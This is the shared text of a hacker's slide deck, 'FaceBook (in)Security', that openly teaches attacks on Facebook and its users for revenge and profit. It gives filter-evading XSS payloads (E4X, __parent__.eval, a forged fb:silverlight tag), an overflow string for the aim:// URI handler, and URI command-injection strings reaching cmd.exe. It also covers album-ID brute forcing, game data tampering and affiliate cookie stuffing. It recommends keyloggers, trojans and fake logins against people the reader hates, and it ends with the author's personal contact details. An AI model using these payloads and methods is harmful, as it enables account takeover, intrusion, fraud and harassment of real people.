Get documents about "FaceBook (in)Security - Majalah Info Komputer Online
W
Description
FaceBook (in)Security - Majalah Info Komputer Online
Shared by: AyechKiki
-
Stats
- views:
- 3
- posted:
- 1/31/2013
- language:
- Unknown
- pages:
- 60
Document Sample
FaceBook (in)Security
Anselmus Ricky
Introduction
Hi, my name is Anselmus Ricky, and I am an asshole.
I hack stuffs for my own benefits, manipulating girls feelings like it means nothing, get
excessively drunk at inappropriate times, ignore consequences to my actions, mock
those idiots and posers, and just generally enjoy exploiting other people’s
psychological insecurities.
But, I do contribute to humanity in one very important way; I share my knowledge and
stories to the world.
FaceBook (in)Security – an Overview
• Attacking via Functionality
• Attacking via Offsite Contents
• Attacking with IMG Tag / Scripts
• Attacking with Simple URL Forgery
• Attacking the Applications
• Attacking via Applications
• Social Engineering and Information Usages*
Attacking FaceBook Functionality
Email Hacking
Attacking FaceBook Functionality
“Won’t it be hard?”
Attacking FaceBook Functionality
“No! You still have no information regarding to her postal
code! How can you hack her then?”
Attacking FaceBook Functionality
Suggestion: “just don’t do it over Mr.
Susilo Bambang Yudhoyono.”
Attacking FaceBook via Offsite Contents
• If you want to spy one someone:
– Use keyloggers and/or trojans (please don’t refer to condom)
• If you hate someone:
– Feel free to take over their account using fake login
• If you hate a lot of ‘someone’:
– Stimulate your fake login with Cross Site Scripting
• If you do not know how to hack FaceBook:
– Feel free to ‘curse’ the person you hate
– Feel free to cast bad comments on his/her walls
– Feel free to use Account Freezer Software
http://www.indowebster.com/Facebook_Account_Freezer_v1.html
Multi-line Strings
On PHP we know multi-line string creation tool called heredoc –
which can help programmer to simplify:
$my_string = "Tizag - Unlock your potential!";
echo "Tizag - Unlock your potential!";
echo $my_string;
Which displayed as:
Tizag - Unlock your potential! Tizag - Unlock your potential!
Multi-line Strings
Into something like:
$my_string = <<<TEST
Tizag.com
Webmaster Tutorials
Unlock your potential!
TEST;
echo $my_string;
Which still displayed as:
Tizag.com Webmaster Tutorials Unlock your potential!
Attacking FaceBook with Script Injections
• XML is more complicated than JavaScript
• XML support multi-line strings creation
• XML are rarely used to commence attack
• XML are not totally filtered by FaceBook
• JS Parser on FireFox support E4X, but JS
Sandbox technology doesn’t even know it
Attacking FaceBook with Script Injections
So instead of just executing this JavaScript:
<script>alert(‘Th0R Was Here!’);</script>
People just execute this:
<script>
<a b=” c” {alert(‘Th0R Was Here!’)}=”d” />
</script>
NB: where variables a, b, c, and d are just trash variables which used to conceal the alert string, you
can change it into anything you like, but do not cross the script conditions (such as replacing
characters, etc).
Attacking FaceBook with Script Injections
And many more:
• "a"["__parent__"].eval("alert('any javascript here');");
• /a/["__parent__"].eval("alert('any javascript here');");
• 1.["__parent__"].eval("alert('any javascript here');");
URI – an Overview
• Generic URI
– http://, ftp://, telnet:, etc.
• What other URI registered on the Net?
– aim://, feed://, firefoxurl://, picasa://, etc.
Attacking FaceBook with URI Abuse
• URI often linked directly to applications
• Applications are vulnerable
• Means – XSS (Cross Site Scripting) is up!
Attacking FaceBook with URI Abuse
• The aim:// is actually calling the
command:
‘Rundll32.exe “C:\Program
Files\Trillian\plugins\aim.dll”,
aim_util_urlHandler url=“%1”
ini=“c:\program
files\trillian\users\default\cache\pending_ai
m.ini”’.
Attacking FaceBook with URI Abuse
• Means attack can modify the value of
aim_util_urlHandler through the URI itself.
Example – aim://OwnURL.
• Copied without being checked (nor
filtered) leading the application to go under
Stack Overflow.
Attacking FaceBook with URI Abuse
Example:
• Aim:///#1111111/
111111111111111111111111111111111111111111111111111111111111
111111111111111111112222222222222222222222222222222222222222
222222222222222222222222222222222222222222222222222222222222
333333333333333333333333333333333333333333333333333333333333
333333333333333333333333333333333333333344444444444444444444
444444444444444444444444444444444444444444444444444444444444
444444444444444444445555555555555555555555555555555555555555
555555555555555555555555555555555555555555555555555555555555
666666666666666666666666666666666666666666666666666666666666
666666666666666666666666666666666666666677777777777777777777
777777777777777777777777777777777777777777777777777777777777
777777777777777777778888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888
999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999900000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000
Attacking FaceBook with URI Abuse
Attacking FaceBook with URI Abuse
• What to do if you wanted to contact Mr. Joan Joman as a girl?
– ymsgr:sendim?joker_salapant&m=I+think+we+should+go+for+
a+date…+meet+you+there
– gtalk:chat?jid=joker_salapant@gmail.com
– gtalk:call?jid=joker_salapant@gmail.com
– aim:goim?screenname=joker_salapant&m=I+love+you+NOT
– skype:joan_salapant?call
Attacking FaceBook with URI Abuse
• Prank! True, it can gain quite some excitement.
• What if you create an XSS which will do the loop to send as
many messages as possible to a single YM account? And put
it on your website which been visited by 600 people on daily
basis?
• Cross-providers DDoS people!
Attacking FaceBook with URI Abuse
There are also simpler URI which can cause a command injection:
• mailto:%00%00../../../../../../windows/system32/cmd”.exe
../../../../../../../../windows/system32/calc.exe “-” blah.bat
• nntp:%00%00../../../../../../windows/system32/cmd”.exe
../../../../../../../../windows/system32/calc.exe “-” blah.bat
• news:%00%00../../../../../../windows/system32/cmd”.exe
../../../../../../../../windows/system32/calc.exe “-” blah.bat
• snews:%00%00../../../../../../windows/system32/cmd”.exe
../../../../../../../../windows/system32/calc.exe “-” blah.bat
• telnet:%00%00../../../../../../windows/system32/cmd”.exe
../../../../../../../../windows/system32/calc.exe “-” blah.bat
• Etc.
Attacking FaceBook with URI Abuse
Several unique and new URI can be used to bypass JS
filtering on FaceBook:
<fb:silverlight silverlightsrc="http://www.somesite.com/silverlight" />
Forged into:
<fb:silverlight silverlightsrc=”a” mce_src=”a” width=”\”
height=”,<script>alert(‘Th0R’)</script>);//” />
NB: Microsoft Silverlight is a web application framework that provides functionalities similar to those
in Adobe Flash, integrating multimedia, graphics, animations and interactivity into a single runtime
environment.
http://wiki.developers.facebook.com/index.php/Fb:silverlight
Attacking FaceBook with URL Forgery
URL Forgery – anyone?
Attacking FaceBook with URL Forgery
Attacking FaceBook with URL Forgery
The new way – the bruteforce attack – the working ones:
• This is the URL of your friend’s album:
– http://facebook.com/album.php?aid=161512&id=987654321
• Where variable id= means their profiles unique numbers
– id=987654321
• Which can easily be seek through friends search
– you can either search, right-click and view properties, etc.
• On the other hand variable aid= means their album unique numbers
– aid=161512
• Which impossible to search – therefore, we bruteforce attack it.
– http://www.owasp.org/index.php/Category:OWASP_Webslayer_
Project
Attacking FaceBook with URL Forgery
Attacking FaceBook with URL Forgery
Attacking FaceBook with URL Forgery
Attacking FaceBook Applications
I hate Zynga. They’ve been on the business for only (less than) 2
years, and now having the numerous growth in financial
records and total company’s revenues – they’ve earned US$100
millions profits for the year of 2009 and counting.
• They implement Mafia Wars, FarmVille, and Café World.
• All of them are world-widely known and become so popular.
• FarmVille itself got 60 millions people playing it on daily basis.
• Mafia Wars follow right on the 2nd place.
• Café World is on its way to the top with tremendous growth.
• Zynga is the best financial contributors to FaceBook.
Attacking FaceBook Applications
So I want to hack FarmVille!
Attacking FaceBook Applications
The easiest way is to play around with the ‘stuck-character’.
• I just simply go to the market and buy some cheap decorations.
Attacking FaceBook Applications
• Put my farmer character on the corner of my farm and lock him up
with the decorations I bought.
Attacking FaceBook Applications
• I start doing my farming life without any time wasted to wait for my
character to move land-by-land to plow, watering and do a lot of
other stuffs.
Attacking FaceBook Applications
But I want in-game money! Then I will just play around the their
“flash-timer”.
Attacking FaceBook Applications
• Approving what my neighbors asked me to do
Attacking FaceBook Applications
• However, I didn’t move my mouse cursor from that point. Keep on
clicking to visit the same neighbor over and over again.
Attacking FaceBook Applications
• After 20 times doing that clicking stuffs. I just click approve to all the
offers given (there will be 20 in totals). Which means I’ve got 20x
bigger money and 20x more experiences compared to normal.
Attacking FaceBook Applications
The harder way is to tamper the data on each games. Since I’m
bored with Zynga – I will do it with other game developers.
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Attacking FaceBook Applications
Do not forget to download Data Tamper via this link:
https://addons.mozilla.org/en-US/firefox/addon/966
Attacking via FaceBook Applications
When you’re running out of ideas to hack FaceBook main
applications, then just use their side applications to hack the
person you hate.
• Create your own group for Social Engineering methods
• Create your own application with malicious contents inside
• Create or find a loophole on other’s applications (usually games)
• Check Friends for Sale (FFS) application
Attacking via FaceBook Applications
Attacking via FaceBook Applications
Attacking via FaceBook Applications
• What if I change the HTML code from:
– <img
src=‘http://i877.photobucket.com/albums/ab333/steffi1306/spongebob.jpg’></img
>
• Into something like:
– <img src=‘http://www.th0r.info/images/amazon.jpg’></img>
• Where amazon.jpg is a redirection to:
– http://www.amazon.com/?Fencoding=UTF8&tag=qufrho-20
Attacking via FaceBook Applications
Attacking via FaceBook Applications
Meaning . . .
• People who open that page will see my picture
• The picture will be shown as broken picture
• While I actually redirected them all to amazon.com
• Within the amazon.com link I engraved my personal affiliate ID
• People will got their browsers cookies stuffed
• Whoever go to amazon.com and buy something, will have their
purchase commissions come into my very own wallet
• What do you think of cookie stuffing (for fun and profit) which
resides on FaceBook – the social networking website with 400
million users accessing it every single day
Thank You
Anselmus Ricky
http://www.th0r.info
Mobile: (+62) 813-8017-5867 and (+1) 206-458-5992
MSN: binus_2_0_0_4@hotmail.com
YM: hackingforte (@yahoo.it)
BlackBerry PIN: 209256E2
